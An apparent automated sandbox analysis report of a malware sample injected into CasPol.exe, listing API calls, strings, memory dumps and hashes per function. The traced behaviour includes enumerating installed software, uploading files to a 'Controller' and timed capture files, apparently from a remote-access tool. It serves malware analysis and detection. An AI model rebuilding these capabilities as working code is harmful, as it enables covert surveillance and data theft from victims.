                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(?), ref: 00413EC8
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00413EEF
                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(?), ref: 00413F27
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00413F40
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00413F66
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                                                                                                                                                                                  • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                                                                                                                                                                                                  • API String ID: 2490988753-744132762
                                                                                                                                                                                                                                  • Opcode ID: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
                                                                                                                                                                                                                                  • Instruction ID: a4547f3d416e9253f7b1cbdd0907a67efdadb69b2b53743d1710677937ed8fa2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6D31C4B1906315A7D320AF25DC44ACBB7ECEF44745F400A2AF844D3201D778DA858AEE
                                                                                                                                                                                                                                  Function 0041B824 Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 214registryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041B846
                                                                                                                                                                                                                                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041B88A
                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 0041BB54
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseEnumOpen
                                                                                                                                                                                                                                  • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                                                                                                                                                                                                  • API String ID: 1332880857-3714951968
                                                                                                                                                                                                                                  • Opcode ID: 949b7845c43138c00e5883570a82b221c4a2f0b2bf07859f710c2a5fc96e8881
                                                                                                                                                                                                                                  • Instruction ID: 4ca6cd9db44c7b11bab16217f2b7ba144dfc64e74838f3250c32f9e768a6938f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 949b7845c43138c00e5883570a82b221c4a2f0b2bf07859f710c2a5fc96e8881
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8C812E311082449BD324EB11DC51AEFB7E9FFD4314F10493FB58A921E1EF74AA49CA9A
                                                                                                                                                                                                                                  Function 0041CA9E Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 73windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041CAE9
                                                                                                                                                                                                                                  • GetCursorPos.USER32(?), ref: 0041CAF8
                                                                                                                                                                                                                                  • SetForegroundWindow.USER32(?), ref: 0041CB01
                                                                                                                                                                                                                                  • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041CB1B
                                                                                                                                                                                                                                  • Shell_NotifyIconA.SHELL32(00000002,00473B50), ref: 0041CB6C
                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 0041CB74
                                                                                                                                                                                                                                  • CreatePopupMenu.USER32 ref: 0041CB7A
                                                                                                                                                                                                                                  • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041CB8F
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                                                                                                                                                                                  • String ID: Close
                                                                                                                                                                                                                                  • API String ID: 1657328048-3535843008
                                                                                                                                                                                                                                  • Opcode ID: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                                                                                                                                                                                                  • Instruction ID: a66ed96c0d91d71762f770de87d5f41dd37c70c4e97b210e23d221b2b7ccacbc
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 68212B71188209FFDB064F64FD4EAAA3F65EB04342F044135B906D40B2D7B9EA90EB18
                                                                                                                                                                                                                                  Function 00444F3D Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$Info
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2509303402-0
                                                                                                                                                                                                                                  • Opcode ID: 4f311dc35998d231116b4ef065710eb7bf66da857f64ae236b680615c36f9f73
                                                                                                                                                                                                                                  • Instruction ID: 0af7f9009007d8880989bd470fdb3e4a62bb8e65dbd2af1b74ff5c8893cb1db7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4f311dc35998d231116b4ef065710eb7bf66da857f64ae236b680615c36f9f73
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D0B18F71900605AFEF11DFA9C881BEEBBF4BF49304F14406EF855B7242DA79A8458B64
                                                                                                                                                                                                                                  Function 00407DEF Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 325fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407F4C
                                                                                                                                                                                                                                  • GetFileSizeEx.KERNEL32(00000000,00000000), ref: 00407FC2
                                                                                                                                                                                                                                  • __aulldiv.LIBCMT ref: 00407FE9
                                                                                                                                                                                                                                  • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 0040810D
                                                                                                                                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408128
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00408200
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000052,00000000,?), ref: 0040821A
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00408256
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$CloseHandle$CreatePointerReadSize__aulldiv
                                                                                                                                                                                                                                  • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $>G
                                                                                                                                                                                                                                  • API String ID: 1884690901-3066803209
                                                                                                                                                                                                                                  • Opcode ID: a9200b904cd464026f7c52520259c68e7c52965eecdcfc832bab961b06e9d9d9
                                                                                                                                                                                                                                  • Instruction ID: 222450ca6543349723abdfa1177da379b39b5876d7444fbb960ea0ab75079841
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a9200b904cd464026f7c52520259c68e7c52965eecdcfc832bab961b06e9d9d9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DAB191316083409BC214FB25C892AAFB7E5AFD4314F40492EF885632D2EF789945C79B
                                                                                                                                                                                                                                  Function 00409E48 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 163sleepCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • Sleep.KERNEL32(00001388), ref: 00409E62
                                                                                                                                                                                                                                    • Part of subcall function 00409D97: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                                                                                                                                                                                                    • Part of subcall function 00409D97: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                                                                                                                                                                                                    • Part of subcall function 00409D97: Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                                                                                                                                                                                                    • Part of subcall function 00409D97: CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                                                                                                                                                                                                  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409E9E
                                                                                                                                                                                                                                  • GetFileAttributesW.KERNEL32(00000000), ref: 00409EAF
                                                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00409EC6
                                                                                                                                                                                                                                  • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409F40
                                                                                                                                                                                                                                    • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00465900,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A049
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                                                                                                                                                                                  • String ID: @CG$@CG$XCG$XCG$xAG$xAG
                                                                                                                                                                                                                                  • API String ID: 3795512280-3163867910
                                                                                                                                                                                                                                  • Opcode ID: 3a21af93ee717603241ce7b1c9632469be16a929bed094211b5e0c5841bec558
                                                                                                                                                                                                                                  • Instruction ID: b7dfc09a395f5416f32c5fe597dbb364f69b6ed32616efff49b152d1c9b912f4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3a21af93ee717603241ce7b1c9632469be16a929bed094211b5e0c5841bec558
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 30518D716043005ACB05BB72D866ABF769AAFD1309F00053FF886B71E2DF3D9D44869A
                                                                                                                                                                                                                                  Function 04577CC2 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • ___free_lconv_mon.LIBCMT ref: 04577D06
                                                                                                                                                                                                                                    • Part of subcall function 045790BA: _free.LIBCMT ref: 045790D7
                                                                                                                                                                                                                                    • Part of subcall function 045790BA: _free.LIBCMT ref: 045790E9
                                                                                                                                                                                                                                    • Part of subcall function 045790BA: _free.LIBCMT ref: 045790FB
                                                                                                                                                                                                                                    • Part of subcall function 045790BA: _free.LIBCMT ref: 0457910D
                                                                                                                                                                                                                                    • Part of subcall function 045790BA: _free.LIBCMT ref: 0457911F
                                                                                                                                                                                                                                    • Part of subcall function 045790BA: _free.LIBCMT ref: 04579131
                                                                                                                                                                                                                                    • Part of subcall function 045790BA: _free.LIBCMT ref: 04579143
                                                                                                                                                                                                                                    • Part of subcall function 045790BA: _free.LIBCMT ref: 04579155
                                                                                                                                                                                                                                    • Part of subcall function 045790BA: _free.LIBCMT ref: 04579167
                                                                                                                                                                                                                                    • Part of subcall function 045790BA: _free.LIBCMT ref: 04579179
                                                                                                                                                                                                                                    • Part of subcall function 045790BA: _free.LIBCMT ref: 0457918B
                                                                                                                                                                                                                                    • Part of subcall function 045790BA: _free.LIBCMT ref: 0457919D
                                                                                                                                                                                                                                    • Part of subcall function 045790BA: _free.LIBCMT ref: 045791AF
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 04577CFB
                                                                                                                                                                                                                                    • Part of subcall function 0457571E: HeapFree.KERNEL32(00000000,00000000,?,0457924F,?,00000000,?,00000000,?,04579276,?,00000007,?,?,04577E5A,?), ref: 04575734
                                                                                                                                                                                                                                    • Part of subcall function 0457571E: GetLastError.KERNEL32(?,?,0457924F,?,00000000,?,00000000,?,04579276,?,00000007,?,?,04577E5A,?,?), ref: 04575746
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 04577D1D
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 04577D32
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 04577D3D
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 04577D5F
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 04577D72
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 04577D80
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 04577D8B
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 04577DC3
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 04577DCA
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 04577DE7
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 04577DFF
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3868412859.0000000004571000.00000040.00001000.00020000.00000000.sdmp, Offset: 04570000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868336669.0000000004570000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868412859.0000000004586000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_4570000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 161543041-0
                                                                                                                                                                                                                                  • Opcode ID: 656512a88584d8b9e76db144e5df2b47aa03922ea58e15ca9c283d0e50ae6278
                                                                                                                                                                                                                                  • Instruction ID: a5ceb0a701e809c9f38e6af5010fdb8191e2a9203258e6953c8d3ef99ac8ba39
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 656512a88584d8b9e76db144e5df2b47aa03922ea58e15ca9c283d0e50ae6278
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BD314A71610209BFEB21AB38F844B6677E9FF84354F14847AE849DB550EE31B890EA14
                                                                                                                                                                                                                                  Function 0045006D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • ___free_lconv_mon.LIBCMT ref: 004500B1
                                                                                                                                                                                                                                    • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F300
                                                                                                                                                                                                                                    • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F312
                                                                                                                                                                                                                                    • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F324
                                                                                                                                                                                                                                    • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F336
                                                                                                                                                                                                                                    • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F348
                                                                                                                                                                                                                                    • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F35A
                                                                                                                                                                                                                                    • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F36C
                                                                                                                                                                                                                                    • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F37E
                                                                                                                                                                                                                                    • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F390
                                                                                                                                                                                                                                    • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3A2
                                                                                                                                                                                                                                    • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3B4
                                                                                                                                                                                                                                    • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3C6
                                                                                                                                                                                                                                    • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3D8
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 004500A6
                                                                                                                                                                                                                                    • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                                                                                                                                                                                                    • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 004500C8
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 004500DD
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 004500E8
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0045010A
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0045011D
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0045012B
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00450136
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0045016E
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00450175
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00450192
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 004501AA
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 161543041-0
                                                                                                                                                                                                                                  • Opcode ID: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                                                                                                                                                                                                  • Instruction ID: 6df0fc8d0da410edbfddc8482cd9dc810a80ebbb5b2f86b8c24a0bb33e3d08c7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 96317235500B00AFEB20AA35D845B5B73E5AF42355F15841FF849E7292DF39AC98CB1A
                                                                                                                                                                                                                                  Function 1001A085 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • ___free_lconv_mon.LIBCMT ref: 1001A0C9
                                                                                                                                                                                                                                    • Part of subcall function 1001CB97: _free.LIBCMT ref: 1001CBB4
                                                                                                                                                                                                                                    • Part of subcall function 1001CB97: _free.LIBCMT ref: 1001CBC6
                                                                                                                                                                                                                                    • Part of subcall function 1001CB97: _free.LIBCMT ref: 1001CBD8
                                                                                                                                                                                                                                    • Part of subcall function 1001CB97: _free.LIBCMT ref: 1001CBEA
                                                                                                                                                                                                                                    • Part of subcall function 1001CB97: _free.LIBCMT ref: 1001CBFC
                                                                                                                                                                                                                                    • Part of subcall function 1001CB97: _free.LIBCMT ref: 1001CC0E
                                                                                                                                                                                                                                    • Part of subcall function 1001CB97: _free.LIBCMT ref: 1001CC20
                                                                                                                                                                                                                                    • Part of subcall function 1001CB97: _free.LIBCMT ref: 1001CC32
                                                                                                                                                                                                                                    • Part of subcall function 1001CB97: _free.LIBCMT ref: 1001CC44
                                                                                                                                                                                                                                    • Part of subcall function 1001CB97: _free.LIBCMT ref: 1001CC56
                                                                                                                                                                                                                                    • Part of subcall function 1001CB97: _free.LIBCMT ref: 1001CC68
                                                                                                                                                                                                                                    • Part of subcall function 1001CB97: _free.LIBCMT ref: 1001CC7A
                                                                                                                                                                                                                                    • Part of subcall function 1001CB97: _free.LIBCMT ref: 1001CC8C
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 1001A0BE
                                                                                                                                                                                                                                    • Part of subcall function 10015A65: RtlFreeHeap.NTDLL(00000000,00000000,?,1001CD2C,?,00000000,?,00000000,?,1001CD53,?,00000007,?,?,1001A21D,?), ref: 10015A7B
                                                                                                                                                                                                                                    • Part of subcall function 10015A65: GetLastError.KERNEL32(?,?,1001CD2C,?,00000000,?,00000000,?,1001CD53,?,00000007,?,?,1001A21D,?,?), ref: 10015A8D
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 1001A0E0
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 1001A0F5
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 1001A100
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 1001A122
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 1001A135
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 1001A143
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 1001A14E
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 1001A186
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 1001A18D
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 1001A1AA
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 1001A1C2
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 161543041-0
                                                                                                                                                                                                                                  • Opcode ID: be70f43cd3f780db0588d603a309c755db6f60602458a46c6275e532dd52c23e
                                                                                                                                                                                                                                  • Instruction ID: 644937dc1452572f85b35f0ffe035dbca8845510b282740a5666290ef4fc3b73
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: be70f43cd3f780db0588d603a309c755db6f60602458a46c6275e532dd52c23e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 09315736600601EFEB21CA78D885B4A73E8EF46391F994519E499DE151DF36FDC08A21
                                                                                                                                                                                                                                  Function 00419128 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 174sleeptimeCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 0041912D
                                                                                                                                                                                                                                  • GdiplusStartup.GDIPLUS(00473AF0,?,00000000), ref: 0041915F
                                                                                                                                                                                                                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 004191EB
                                                                                                                                                                                                                                  • Sleep.KERNEL32(000003E8), ref: 0041926D
                                                                                                                                                                                                                                  • GetLocalTime.KERNEL32(?), ref: 0041927C
                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000000,00000018,00000000), ref: 00419365
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                                                                                                                                                                                  • String ID: XCG$XCG$XCG$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                                                                                                                                                                                                  • API String ID: 489098229-65789007
                                                                                                                                                                                                                                  • Opcode ID: 2092e2a9290db2fead81da8bfe0b3e9a71be9b16fee16b89e6b18216e54b6ba7
                                                                                                                                                                                                                                  • Instruction ID: b922dce7c629cfc9b1bb11cb74a08c0e3353b39699bf4d86e46594d10c943285
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2092e2a9290db2fead81da8bfe0b3e9a71be9b16fee16b89e6b18216e54b6ba7
